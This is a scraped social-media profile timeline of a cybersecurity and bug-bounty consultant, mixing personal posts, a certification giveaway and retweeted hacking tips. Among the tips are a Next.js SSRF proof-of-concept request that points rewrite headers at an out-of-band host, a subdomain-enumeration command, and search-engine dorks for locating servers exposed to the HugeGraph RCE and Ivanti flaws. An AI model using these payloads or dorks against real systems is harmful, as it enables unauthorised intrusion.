Elias Dortumor | DortNova

427 posts

Elias Dortumor | DortNova banner
Elias Dortumor | DortNova

Elias Dortumor | DortNova

@dortnova

Cybersecurity & AI Automation consultant. Helping founders scale with confidence through my Test-Build-Empower framework. #Cybersecurity #Automation #ITtraining

Ghana Katılım Ekim 2018
290 Takip Edilen44 Takipçiler
Elias Dortumor | DortNova retweetledi
DarkShadow
DarkShadow@darkshadow2bd·
Nextjs SSRF in Middleware header! ✅POC: GET / HTTP/1.1 Host: target. com Location: http://oast. me X-Middleware-Rewrite: http://oast. me For more BugBounty tips join my telegram channel 👉🏼 t.me/ShellSec
DarkShadow tweet media
English
4
122
623
32.8K
N$🌟
N$🌟@__nav1n_·
Simple LFI using my path traversal script on GitHub. Used @0xAsm0d3us’s ParamSpider to gather URLs, filtered for relevant parameters, slightly modified the script to inject payloads into parameters like ?path and ?file, & ran the script — got 1 hit out of 20k+ URLs. The target is from public VDP scraped from @arkadiyt’s list. #BugBounty
N$🌟 tweet media
English
9
45
418
25.3K
Elias Dortumor | DortNova retweetledi
Security BSides Ahmedabad
Security BSides Ahmedabad@bsidesahmedabad·
🚨 OSCP GIVEAWAY ALERT🚨 We’re giving away 3 OSCP vouchers to supercharge your pentesting journey – proudly sponsored by @offsectraining ! 💥🙌 To enter: 1.✅ Follow Us 2.🔁 Retweet this post 3.❤️ Like this post 4.💬 Reply with your funniest cybersecurity meme 🎯 We’ll pick 3 random winners – don’t miss your chance to win the gold standard in offensive security! 🗓️ Deadline= 20 June Let the hacking+meme battle begin! 🧠💻 #OSCP #OffSec #Giveaway #BSidesAhmedabad #Infosec #Cybersecurity
Security BSides Ahmedabad tweet media
English
549
495
865
81.8K
Elias Dortumor | DortNova
Elias Dortumor | DortNova@dortnova·
🚀Persistence is key in bug bounty! 🔎💻 Just had one of my reports closed as a duplicate, but that only means I’m looking in the right places! 🎯 Every closed report is a step closer to the next big find. 💪 Bug bounty is a game of patience.#BugBounty #CyberSecurity #KeepHunting
Elias Dortumor | DortNova tweet media
English
0
1
1
203
Elias Dortumor | DortNova
Elias Dortumor | DortNova@dortnova·
Get more subdomains by probing the csp headers of all previously discovered subdomains 💥 . This gives you more attack surface to hunt on. cat allsubs.txt | httpx -csp-probe -random-agent -retries 2 | grep \.domain\.com > domain_csp_subs.txt. #bugbountytips #BugBounty
Elias Dortumor | DortNova tweet media
English
0
0
6
177
Elias Dortumor | DortNova retweetledi
Hunter
Hunter@HunterMapping·
🚨Alert🚨CVE-2024-27348: Unauthenticated users can execute OS commands via Groovy injection in Apache HugeGraph-Server. Upgrade to version 1.3.0 to mitigate. 🔥Python Scanner:github.com/Zeyad-Azima/CV… 📊200+ Services are found on hunter.how 🔗Hunter Link:hunter.how/list?searchVal… 👇Query Hunter: /product.name="Apache HugeGraph" FOFA: app="HugeGraph-Studio" SHODAN: http.title:"HugeGraph" #HugeGraph #RCE #hunterhow #infosec #infosecurity #Infosys #Vulnerability
Hunter tweet media
elSec@adrielsec

CVE-2024-27348 (RCE) - Unauth users can execute commands via Groovy injection in Apache HugeGraph-Server. Fix: Upgrade to version 1.3.0 Python Scanner: github.com/Zeyad-Azima/CV… #bugbounty #bugbountytip #bugbountytips

English
1
83
292
45K
Elias Dortumor | DortNova retweetledi
Corben Leo
Corben Leo@hacker_·
You can find easy critical vulnerabilities. It just takes finding unique attack surfaces. Here's an example of how you can, using a story of how I hacked a car company:
English
14
200
910
96.4K
Elias Dortumor | DortNova retweetledi
KNOXSS
KNOXSS@KN0X55·
#DidYouKnow Most of the #XSS payloads out there are completely USELESS! They are simple variations of the same XSS cases. Not even filter aware! KNOXSS has specially crafted payloads for dozens of scenarios w/ meaningful variations for each one. That's why KNOXSS is the best!
KNOXSS tweet media
English
0
3
10
1.3K
Elias Dortumor | DortNova retweetledi
Hunter
Hunter@HunterMapping·
🚨Alert🚨Two high-severity flaws found in Ivanti's Connect Secure, Policy Secure and Neurons for ZTA. ⚠CVE-2024-21893(CVSS: 8.2) is actively exploited, granting access to restricted resources. CVE-2024-21888 (CVSS: 8.8) enables escalation to admin. 📊30K+ Services are found on Hunter.how 🔗Hunter:hunter.how/list?searchVal… Dorks 👇👇👇 Hunter:/product.name="Ivanti Connect Secure" or product.name="Ivanti Policy Secure" SHODAN: http.title:"Ivanti Connect Secure" 📰Refer to thehackernews.com/2024/01/alert-… #Ivanti #hunterhow #infosec #infosecurity #Infosys #Vulnerability
Hunter tweet media
English
0
13
25
5K
N$🌟
N$🌟@__nav1n_·
My first-ever SQL injection in Oracle: SQLMap couldn't find any exploits, but Ghauri was successful here. Using my same old tactic, scraped URLs using WBU and manually tested URLs older than 2-3 years. #BugBounty #SQLInjection #Oracle
N$🌟 tweet mediaN$🌟 tweet media
English
63
113
915
58.6K
Het Mehta
Het Mehta@hetmehtaa·
I think @GodfatherOrwa should be banned from Finding SQLI, Others are left with Duplicates when he enters a program!
GIF
English
4
2
48
8K